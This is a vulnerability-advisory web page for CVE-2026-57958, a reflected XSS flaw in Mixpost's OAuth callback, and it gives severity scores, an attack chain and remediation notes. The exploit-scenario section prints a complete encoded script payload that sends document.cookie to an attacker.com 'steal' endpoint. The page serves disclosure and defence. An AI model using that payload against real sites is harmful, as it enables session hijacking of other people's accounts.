Skip to main content

Mixpost CVE-2026-57958

| EUVDEUVD-2026-40143 MEDIUM
Cross-site Scripting (XSS) (CWE-79)
2026-06-29 disclosure@vulncheck.com GHSA-x4g3-x4c9-rjf8
5.1
CVSS 4.0 · Vendor: vulncheck
Share

Severity by source

Vendor (vulncheck) PRIMARY
5.1 MEDIUM
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vuln.today AI
6.1 MEDIUM

Reflected XSS crosses browser scope boundary (S:C); attacker is unauthenticated (PR:N) but victim click is required (UI:R); C:L/I:L for session theft and unauthorized actions; no availability impact.

3.1 AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
4.0 AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N

Primary rating from Vendor (vulncheck).

CVSS VectorVendor: vulncheck

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
A
Scope
X

Lifecycle Timeline

1
Analysis Generated
Jun 29, 2026 - 18:41 vuln.today

DescriptionCVE.org

Mixpost through 2.6.0 contains a reflected cross-site scripting vulnerability that allows unauthenticated attackers to execute arbitrary JavaScript in authenticated users' browsers by crafting malicious OAuth callback URLs with unsanitized error query parameters. Attackers can exploit the OAuth callback controller's failure to sanitize error parameters before rendering them through Laravel flash messages via the Vue v-html directive to hijack authenticated user sessions or perform unauthorized actions.

AnalysisAI

Reflected XSS in Mixpost through version 2.6.0 enables unauthenticated remote attackers to execute arbitrary JavaScript in authenticated users' browsers by delivering crafted OAuth callback URLs containing malicious error query parameters. The OAuth callback controller fails to sanitize error parameters before routing them through Laravel flash messages, which are then rendered by Vue's v-html directive without HTML escaping - creating a direct injection path into the DOM. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Craft malicious OAuth callback URL with injected error parameter
Delivery
Deliver URL to authenticated Mixpost user via phishing
Exploit
Victim loads crafted URL in authenticated browser session
Execution
Error parameter flows unsanitized through Laravel flash into Vue v-html
Persist
Arbitrary JavaScript executes in victim browser
Impact
Hijack authenticated session or perform unauthorized actions

Vulnerability AssessmentAI

Exploitation Exploitation requires all of the following conditions: (1) the target instance runs Mixpost through version 2.6.0; (2) at least one OAuth-based social media integration is configured and active, enabling the OAuth callback controller code path; (3) an authenticated Mixpost user - the victim - must navigate to an attacker-crafted OAuth callback URL containing a malicious error query parameter, typically via a phishing link or injected hyperlink. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The CVSS 4.0 base score of 5.1 (Medium) accurately models this vulnerability's structure: the attacker has no authentication requirement and faces low complexity (AV:N/AC:L/AT:N/PR:N), but the attack is gated behind required user interaction (UI:A), and all tangible impact falls on the subsequent system - the authenticated victim's browser session (SC:L/SI:L) - rather than the server itself (VC:N/VI:N/VA:N). … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker identifies an organization using Mixpost and crafts a callback URL such as https://target-mixpost.example.com/oauth/callback?error=%3Cscript%3Edocument.location%3D%27https%3A%2F%2Fattacker.com%2Fsteal%3Fc%3D%27%2Bdocument.cookie%3C%2Fscript%3E, then delivers it to an authenticated Mixpost administrator via a phishing email disguised as a social media platform notification. When the administrator clicks the link, their browser loads the callback page, the unsanitized error parameter is rendered via v-html into the DOM, and the attacker's script executes - exfiltrating the session cookie or silently performing actions (such as publishing posts) through the victim's authenticated context. …
Remediation Upgrade Mixpost beyond version 2.6.0 once a patched release is confirmed available; however, an exact fixed version has not been independently confirmed from the available references - the GitHub issue (https://github.com/inovector/mixpost/issues/204) and VulnCheck advisory (https://www.vulncheck.com/advisories/mixpost-reflected-xss-via-oauth-callback-error-parameter) should be monitored for a confirmed patch. … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

CVE-2026-57958 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy